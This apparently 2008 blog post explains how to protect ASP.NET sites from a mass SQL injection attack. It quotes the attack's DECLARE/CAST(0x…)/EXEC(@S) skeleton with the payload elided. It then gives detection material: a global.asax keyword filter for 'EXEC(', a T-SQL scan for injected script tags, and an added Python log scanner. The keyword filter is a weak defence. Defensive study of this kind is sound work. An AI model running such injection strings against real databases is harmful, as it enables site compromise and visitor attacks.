SQL Injection Attacks: How To Shield Your ASP.NET Website and Database
Published on 7/18/2008 by Malek Chtioui

You may have seen this HTTP request in your website logs:


In a more readable form, with the hex-encoded payload elided:

DECLARE @S CHAR(4000)
SET @S=CAST(0x4445434C4152452 ... 5F437572736F72 AS CHAR(4000))
EXEC(@S)


This script takes advantage of the CAST function: once decoded, the @S variable contains a T-SQL script that injects a script into all fields of type VARCHAR in the database. When a user then opens a web page, the injected script calls an external JavaScript file, which is a Cross-Site Scripting (XSS) exploit.
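
The decoding step described above can be reproduced safely when triaging logs. The following Python is an added example, not code from the original article: it finds the DECLARE / CAST(0x...) / EXEC(@var) pattern in a log line and decodes the hex literal as text without executing anything. The simplified log layout, the function names and the harmless sample payload are constructed for illustration.

```python
import re
from urllib.parse import unquote

# CAST(0x<hex> AS CHAR|VARCHAR|NCHAR|NVARCHAR(n)), matched after URL decoding.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-F]+)\s+AS\s+(N?(?:VAR)?CHAR)\b", re.I)
# EXEC(@var): the step that runs the decoded string.
EXEC_VAR = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.I)


def decode_payload(hex_text, sql_type):
    """Return the text SQL Server would obtain from the CAST."""
    hex_text = hex_text[: len(hex_text) // 2 * 2]   # tolerate a log-truncated literal
    raw = bytes.fromhex(hex_text)
    # N-types read the bytes as UTF-16LE; CHAR/VARCHAR as single-byte text.
    wide = sql_type.upper().startswith("N")
    return raw.decode("utf-16-le" if wide else "latin-1", errors="replace")


def scan_line(line):
    """Return a finding for one log line, or None when the pattern is absent."""
    text = unquote(line)
    cast = CAST_HEX.search(text)
    if cast is None or EXEC_VAR.search(text) is None:
        return None
    sql = decode_payload(cast.group(1), cast.group(2))
    return {"sql": sql, "injects_script_tag": "<script" in sql.lower()}


def build_sample_log():
    """Constructed sample lines (not real traffic) in a simplified IIS-like layout."""
    harmless = "PRINT '<script>placeholder</script>'".encode("latin-1").hex().upper()
    attack_qs = (";DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x" + harmless
                 + "%20AS%20CHAR(4000));EXEC(@S);")
    return [
        "2008-07-18 10:00:01 GET /my_page.aspx id=5 200",
        "2008-07-18 10:00:02 GET /my_page.aspx " + attack_qs + " 200",
        "2008-07-18 10:00:03 GET /search.aspx q=cast%20of%20characters 200",
    ]


if __name__ == "__main__":
    for number, entry in enumerate(build_sample_log(), start=1):
        finding = scan_line(entry)
        if finding:
            print(f"line {number}: {finding}")
```

Any line it flags means the request reached the site; whether the payload ran still has to be confirmed by scanning the database.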

Many websites are still vulnerable to SQL injection attacks. The easiest way to protect your application and database is to add a filter in the Application_BeginRequest section of the global.asax file:

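protected void Application_BeginRequest(object sender, EventArgs e)
{
    HttpContext context = HttpContext.Current;
    if (context != null)
    {
        // Raw query string as sent by the client (still URL-encoded).
        string queryString = context.Request.ServerVariables["QUERY_STRING"];
        if (!string.IsNullOrEmpty(queryString))
        {
            // Decode %XX escapes, then remove spaces and upper-case the text
            // so that "exec (" and "EXEC(" compare equal.
            queryString = Server.UrlDecode(queryString);
            queryString = queryString.Replace(" ", string.Empty).ToUpper();

            // The injected request runs its decoded payload with EXEC(@S).
            if (queryString.Contains("EXEC("))
            {
                // Error Handling
                // .........................

            }
        }
    }
}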

If you have been attacked, you must scan your databases for malicious scripts. You can use this T-SQL script to do so:

  exec sp_msforeachdb '
  Print(''Scanning Database [?]'')
  DECLARE @T varchar(255), @C varchar(255)
  DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from [?].dbo.sysobjects a,[?].dbo.syscolumns b
  where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
  order by a.name, b.name
  OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
  If Left(@T,1)<>''#''
  Begin
  Print('' Scanning Table [''+@T+''], Column: [''+@C+'']'')
  Exec(''if exists(select [''+@C+'']  from [?].dbo.[''+@T+''] where [''+@C+''] like ''''%<script%'''') print ''''>>> FOUND in [''+@T+''].[''+@C+'']'''''')
  End
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
  '


Other helpful links:

> Microsoft Source Code Analyzer for SQL Injection is a static code analysis tool for finding SQL Injection vulnerabilities in ASP code. Customers can run the tool on their ASP source code to help identify code paths that are vulnerable to SQL Injection attacks.

> Scrawlr: a tool to help identify code paths that are vulnerable to SQL Injection. Scrawlr is developed by the HP Web Security Research Group in coordination with the Microsoft Security Response Center (MSRC).